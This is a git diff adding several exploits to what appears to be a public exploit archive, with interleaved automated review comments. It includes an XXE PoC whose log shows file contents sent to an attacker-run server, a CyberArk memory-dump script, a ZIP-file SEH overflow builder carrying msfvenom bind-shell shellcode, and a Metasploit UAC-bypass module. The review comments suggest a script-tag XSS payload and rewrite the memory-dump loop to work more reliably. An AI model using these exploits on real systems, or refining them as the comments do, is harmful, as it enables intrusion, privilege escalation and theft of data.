diff --git a/exploits/aspx/webapps/44831.txt b/exploits/aspx/webapps/44831.txt
new file mode 100644
index 000000000..3882d7000
--- /dev/null
+++ b/exploits/aspx/webapps/44831.txt
@@ -0,0 +1,16 @@
+# Exploit Title: EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
+# Date: 2018-06-01
+# Exploit Author: Chris Barretto
+# Vendor Homepage: https://www.emssoftware.com/
+# Software Link: https://docs.emssoftware.com/Content/V44.1_ReleaseNotes.htm
+# Version: Versions prior to 8.0.0.201805210 are vulnerable
+# Tested on: Master Calendar v8.0.0.127
+# CVE : CVE-2018-11628
+
+# 1. Description:
+# Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters are not properly sanitized,
+# allowing malicious attackers to send a crafted URL and execute code in the context of the user's browser.
+
+#2. Proof of concept:
+# The following PoC URL is available:
+https://example.com/MasterCalendar/RssFeeds.aspx?Name=abcxyz
\ No newline at end of file
diff --git a/exploits/java/webapps/44827.txt b/exploits/java/webapps/44827.txt
new file mode 100644
index 000000000..f33f24bf9
--- /dev/null
+++ b/exploits/java/webapps/44827.txt
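Review bot: The PoC URL on the last line carries only the harmless value `Name=abcxyz`, so the page does not actually demonstrate the reflected XSS the title claims, and a reader cannot tell which characters survive the application's output encoding. I would either use a value that proves reflection, e.g. `RssFeeds.aspx?Name=abcxyz%22%3E%3Cscript%3Ealert(1)%3C/script%3E` (presumably the original submission carried such a marker and it was stripped), or state explicitly in the Description that `Name` is reflected unencoded into the RSS response body. The fixed build is also given inconsistently: the Exploit Title says `8.0.0.20180520` while the Version and Description lines say `8.0.0.201805210`; one of them should be corrected so defenders can match the right release.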
@@ -0,0 +1,68 @@ +# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE) +# Exploit Author: Ahmet GUREL, Canberk BOLAT +# Software Link: https://www.searchblox.com/ +# Version: < = SearchBlox Version 8.6.7 +# Platform: Java +# Tested on: Windows +# CVE: CVE-2018-11586 + +# 1. DETAILS + +An XML External Entity attack is a type of attack against an +application that parses XML input. This attack occurs when XML input +containing a reference to an external entity is processed by a weakly +configured XML parser. This attack may lead to the disclosure of +confidential data, denial of service, server side request forgery, +port scanning from the perspective of the machine where the parser is +located, and other system impacts. Reference: +https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing + +# 2. PoC: + +XML external entity (XXE) vulnerability in /searchblox/api/rest/status in +SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary +files or conduct server-side request forgery (SSRF) attacks via a crafted +DTD in an XML request. + +HTTP Request: +_____________ + +GET /searchblox/api/rest/status HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci; +XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5; +AdsOnSearchPage=5 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Length: 140 + + + +%dtd; +%all; +%send;]> + +#Ext.dtd File : +_______________ + + + +"> +%all; + +#HTTP Response: +_______________ + +Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000 +Serving HTTP on 0.0.0.0 port 7000 ... 
+192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 - +192.168.1.2 - - [03/Jun/2018 15:37:16] "GET +/?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1 +HTTP/1.1" 200 - \ No newline at end of file diff --git a/exploits/linux/remote/44829.py b/exploits/linux/remote/44829.py new file mode 100755 index 000000000..b3d68d4c3 --- /dev/null +++ b/exploits/linux/remote/44829.py 
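Review bot: The advisory claims the `/searchblox/api/rest/status` endpoint is exploitable by remote unauthenticated users, but the quoted request carries a `JSESSIONID` and an `XSRF-TOKEN` cookie, so nothing on the page shows the XXE works without a session; either drop the `Cookie:` header from the PoC or add a sentence stating it was verified without one. The request is also a `GET` with `Content-Length: 140` and a body, which many proxies and servlet containers discard, so noting whether `POST` triggers the same parse would make it reproducible. The XML payload and the `Ext.dtd` contents appear to have lost their markup in rendering (only `%dtd;`, `%all;`, `%send;` and a stray `">` survive), so the out-of-band chain can only be inferred from the SimpleHTTPServer log, which does show `win.ini` contents arriving in the query string after the `ext.dtd` fetch.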
@@ -0,0 +1,46 @@ +# Exploit Title: CyberArk < 10 - Memory Disclosure +# Date: 2018-06-04 +# Exploit Author: Thomas Zuk +# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ +# Version: < 9.7 and < 10 +# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10 +# CVE: CVE-2018-9842 + +# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd +# paste the following bytes into a hexedited file named logon.bin: +#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000 + + +#!/usr/bin/python + +import socket +import os +import sys + +ip = "10.107.32.21" +port = 1858 + +# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services. 
+# The below is a sample login request that is needed to receive the memory + +pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00" + + +for iteration in range(0, 110): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((ip, port)) + s.send(pacli_logon) + + # recieve response + s.recv(200) + reply = s.recv(1500) + + # write responses to file + file = open("cyberark_memory", "a") + + file.write("received: \n") + file.write(reply) + file.write("\n\n\n") + file.close() + + s.close() \ No newline at end of file diff --git a/exploits/windows/local/44828.py b/exploits/windows/local/44828.py new file mode 100755 index 000000000..9b90d6358 --- /dev/null +++ b/exploits/windows/local/44828.py 
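Review bot: The loop body writes the raw reply into a file opened with `open("cyberark_memory", "a")` and never closes the socket if `connect` or `recv` raises, so a single refused connection aborts the whole 110-iteration run with the socket and file handle left open, and on Windows the text-mode append would translate any `0x0a` byte inside the dumped memory. Use `sendall` (plain `send` may write a short buffer), a `try/finally` around the socket, and a `with open(..., "ab")` for the dump so the bytes are written verbatim. The unconditional `s.recv(200)` also assumes the leading frame arrives in exactly one segment, which is presumably only true on a LAN. `sys` and `os` are imported but unused; taking `ip` from `sys.argv` instead of the hardcoded `10.107.32.21` would make the script usable without editing it.
```python
for iteration in range(0, 110):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((ip, port))
        s.sendall(pacli_logon)
        s.recv(200)              # leading frame the original discards
        reply = s.recv(1500)
    finally:
        s.close()

    # binary append so the dump is byte-exact on every platform
    with open("cyberark_memory", "ab") as dump:
        dump.write("received: \n")
        dump.write(reply)
        dump.write("\n\n\n")
```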
@@ -0,0 +1,197 @@ +#!/usr/bin/python +#----------------------------------------------------------------------------------------------------------# +# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) # +# Exploit Author : Hashim Jawad - @ihack4falafel # +# Vendor Homepage : http://mc1soft.com/index.shtml # +# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe # +# Tested on : Windows 7 Enterprise - SP1 (x86) # +#----------------------------------------------------------------------------------------------------------# + +# Disclosure Timeline: +# ==================== +# 05-28-18: Contacted vendor, no response +# 05-30-18: Contacted vendor again, responded with patch and requested further testing +# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested +# 05-31-18: Vendor applied new patch and requested further testing +# 05-31-18: The new patch nullified the vulnerability +# 06-03-18: Version 4.95 was released +# 06-03-18: Proof of concept exploit published + +#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode +#Payload size: 710 bytes +shellcode = "" +shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" +shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30" +shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51" +shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b" +shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b" +shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36" +shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c" +shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d" +shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67" +shellcode += 
"\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c" +shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38" +shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30" +shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53" +shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61" +shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f" +shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55" +shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d" +shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38" +shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c" +shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53" +shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39" +shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31" +shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f" +shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d" +shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30" +shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54" +shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f" +shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30" +shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49" +shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a" +shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50" +shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f" +shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58" +shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76" +shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32" +shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37" +shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f" +shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b" +shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48" +shellcode += 
"\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75" +shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79" +shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56" +shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d" +shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71" +shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66" +shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36" +shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76" +shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f" +shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e" +shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58" +shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b" +shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76" +shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c" +shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30" +shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52" +shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55" +shellcode += "\x41\x41" + +####################### ZIP File Structure ######################## +################################################################### +######################## Local File Header ######################## +LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature +LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0 +LocalFileHeader += '\x00\x00' # general purpose bit flag +LocalFileHeader += '\x00\x00' # compression method +LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23 +LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3 +LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length +LocalFileHeader += '\x00\x00\x00\x00' # compressed size +LocalFileHeader += '\x00\x00\x00\x00' # uncompressed 
size +LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes +LocalFileHeader += '\x00\x00' # extra field length +LocalFileHeader += '\x00' # file name +#LocalFileHeader += '\x00' # extra filed +################## Central Directory File Header ################## +CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature +CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0 +CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0 +CDFileHeader += '\x00\x00' # general purpose bit flag +CDFileHeader += '\x00\x00' # compression method +CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23 +CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3 +CDFileHeader += '\x00\x00\x00\x00' # CRC-32 +CDFileHeader += '\x00\x00\x00\x00' # compressed size +CDFileHeader += '\x00\x00\x00\x00' # uncompressed size +CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes +CDFileHeader += '\x00\x00' # extra field length +CDFileHeader += '\x00\x00' # file comment length +CDFileHeader += '\x00\x00' # disk number where file starts +CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file +CDFileHeader += '\x24\x00\x00\x00' # external file attributes +CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header +#CDFileHeader += '\x00' # file name +#CDFileHeader += '\x00' # extra field +#CDFileHeader += '\x00' # file comment +################ End of Central Directory Record ################## +EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature +EOCDRHeader += '\x00\x00' # number of this disk +EOCDRHeader += '\x00\x00' # disk where central directory starts +EOCDRHeader += '\x01\x00' # number of central directory records on this disk +EOCDRHeader += '\x01\x00' # total number of central directory records +EOCDRHeader += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes +EOCDRHeader += 
'\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive +EOCDRHeader += '\x00\x00' # comment length +#EOCDRHeader += '\x00' # comment + +Witchcraft = '\x54' # PUSH ESP * save stack pointer +Witchcraft += '\x5F' # POP EDI +Witchcraft += '\x54' # PUSH ESP * calculate offset for decoder +Witchcraft += '\x58' # POP EAX +Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111 +Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111 +Witchcraft += '\x2D\x53\x25\x22\x22' # SUB EAX,22222553 +Witchcraft += '\x50' # PUSH EAX +Witchcraft += '\x5C' # POP ESP + +#https://github.com/ihack4falafel/Slink +#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax' +#Enter your shellcode: 9089FC89F8058C050000FFE0 +#[+] Shellcode size is divisible by 4 +#[+] Encoding [e0ff0000].. +#[!] [01] and/or [f] and/or [00] found, using alterantive encoder.. +Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a +Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 +Witchcraft += "\x05\x11\x11\x77\x61" ## add eax, 0x61771111 +Witchcraft += "\x05\x11\x11\x66\x51" ## add eax, 0x51661111 +Witchcraft += "\x05\x11\x11\x55\x61" ## add eax, 0x61551111 +Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333 +Witchcraft += "\x50" ## push eax +#[+] Encoding [058c05f8].. +#[!] [01] and/or [f] and/or [00] found, using alterantive encoder.. +Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a +Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 +Witchcraft += "\x05\x74\x13\x46\x13" ## add eax, 0x13461374 +Witchcraft += "\x05\x64\x13\x45\x13" ## add eax, 0x13451364 +Witchcraft += "\x05\x53\x12\x34\x12" ## add eax, 0x12341253 +Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333 +Witchcraft += "\x50" ## push eax +#[+] Encoding [89fc8990].. +#[!] [01] and/or [f] and/or [00] found, using alterantive encoder.. 
+Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a +Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 +Witchcraft += "\x05\x41\x44\x76\x44" ## add eax, 0x44764441 +Witchcraft += "\x05\x41\x44\x65\x44" ## add eax, 0x44654441 +Witchcraft += "\x05\x41\x34\x54\x34" ## add eax, 0x34543441 +Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333 +Witchcraft += "\x50" ## push eax + +Evil = '\x41' * 3066 # offset to shellcode +Evil += shellcode # bind shell +Evil += '\x43' * (716-len(shellcode)) # shellcode host +Evil += Witchcraft # magic! +Evil += '\x42' * (126-len(Witchcraft)) # witchcraft host +Evil += '\x74\x80\x75\x80' # nSEH - short jump backward (jump net) +Evil += '\x6e\x4c\x40\x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe +Evil += '\x41' * (4064-3908-4-4) +Evil += '.txt' + +buffer = LocalFileHeader +buffer += Evil +buffer += CDFileHeader +buffer += Evil +buffer += EOCDRHeader + +try: + f=open("Evil.zip","w") + print "[+] Creating %s bytes evil payload.." %len(Evil) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/exploits/windows/local/44830.rb b/exploits/windows/local/44830.rb new file mode 100755 index 000000000..3601892eb --- /dev/null +++ b/exploits/windows/local/44830.rb 
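Review bot: `f=open("Evil.zip","w")` writes a binary archive in text mode, so on a Windows host any `0x0a` byte would be expanded to `0x0d 0x0a` and shift every offset the SEH chain depends on; the payload only survives today because the msfvenom bad-chars list excludes `\x0a`/`\x0d` and the hand-written ZIP header and `Witchcraft` bytes happen to contain none. Open the file as `with open("Evil.zip", "wb") as f:` and drop the `except Exception as e: print e` that turns a failed write into a quiet exit with status 0. The script is Python 2 only (`print` statements, byte-valued `str` literals) while the shebang is the bare `#!/usr/bin/python`; a `#!/usr/bin/python2` or one header line saying so would spare readers a confusing syntax error on a Python 3 host. The arithmetic does line up: `3066 + 716 + 126 + 4 + 4 + 148 + 4` is 4068, matching the `0x0fe4` file-name length in both headers.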
@@ -0,0 +1,205 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::Powershell + include Post::Windows::Priv + include Post::Windows::Registry + include Post::Windows::Runas + + SLUI_DEL_KEY = "HKCU\\Software\\Classes\\exefile".freeze + SLUI_WRITE_KEY = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze + EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze + EXEC_REG_VAL = ''.freeze # This maps to "(Default)" + EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze + SLUI_PATH = "%WINDIR%\\System32\\slui.exe".freeze + CMD_MAX_LEN = 16383 + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)', + 'Description' => %q{ + This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under + the Current User hive, and inserting a custom command that will get invoked when any binary + (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable + to file handler hijacking. When we run slui.exe with changed Registry key + (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin + instead of slui.exe. + + The module modifies the registry in order for this exploit to work. The modification is + reverted once the exploitation attempt has finished. + + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting the + payload in a different process. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'bytecode-77', # UAC bypass discovery and research + 'gushmazuko', # MSF & PowerShell module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [ + ['Windows x86', { 'Arch' => ARCH_X86 }], + ['Windows x64', { 'Arch' => ARCH_X64 }] + ], + 'DefaultTarget' => 0, + 'References' => [ + [ + 'URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation', + 'URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1' + ] + ], + 'DisclosureDate' => 'Jan 15 2018' + ) + ) + end + + def check + if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled? + CheckCode::Appears + else + CheckCode::Safe + end + end + + def exploit + # Validate that we can actually do things before we bother + # doing any more work + check_permissions! + + commspec = 'powershell' + registry_view = REGISTRY_VIEW_NATIVE + psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" + + # Make sure we have a sane payload configuration + if sysinfo['Architecture'] == ARCH_X64 + if session.arch == ARCH_X86 + # On x64, check arch + commspec = '%WINDIR%\\Sysnative\\cmd.exe /c powershell' + if target_arch.first == ARCH_X64 + # We can't use absolute path here as + # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session + psh_path = "powershell.exe" + end + end + if target_arch.first == ARCH_X86 + # Invoking x86, so switch to SysWOW64 + psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" + end + else + # if we're on x86, we can't handle x64 payloads + if target_arch.first == ARCH_X64 + fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') + end + end + + if !payload.arch.empty? 
&& (payload.arch.first != target_arch.first) + fail_with(Failure::BadConfig, 'payload and target should use the same architecture') + end + + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + payload_value = rand_text_alpha(8) + psh_path = expand_path(psh_path) + + template_path = Rex::Powershell::Templates::TEMPLATE_DIR + psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) + + if psh_payload.length > CMD_MAX_LEN + fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") + end + + psh_stager = "\"IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" + cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" + + existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" + exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? + + if existing.empty? 
+ registry_createkey(SLUI_WRITE_KEY, registry_view) + end + + print_status("Configuring payload and stager registry keys ...") + unless exist_delegate + registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) + end + + registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) + + # Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. + cmd_path = expand_path(commspec) + cmd_args = expand_path("Start-Process #{SLUI_PATH} -Verb runas") + print_status("Executing payload: #{cmd_path} #{cmd_args}") + + # We can't use cmd_exec here because it blocks, waiting for a result. + client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true) + + # Wait a copule of seconds to give the payload a chance to fire before cleaning up + # TODO: fix this up to use something smarter than a timeout? + sleep(3) + + handler(client) + + print_status("Cleaining ...") + unless exist_delegate + registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) + end + if existing.empty? + registry_deletekey(SLUI_DEL_KEY, registry_view) + else + registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) + end + registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view) + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + print_status('UAC is Enabled, checking level...') + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + if admin_group.nil? 
+ print_error('Either whoami is not there or failed to execute')
+ print_error('Continuing under assumption you already checked...')
+ else
+ if admin_group
+ print_good('Part of Administrators group! Continuing...')
+ else
+ fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+ end
+ end
+
+ if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+ fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+ end
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b63bf164b..501b93d3d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9714,7 +9714,7 @@ id,file,description,date,author,type,platform,port
 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
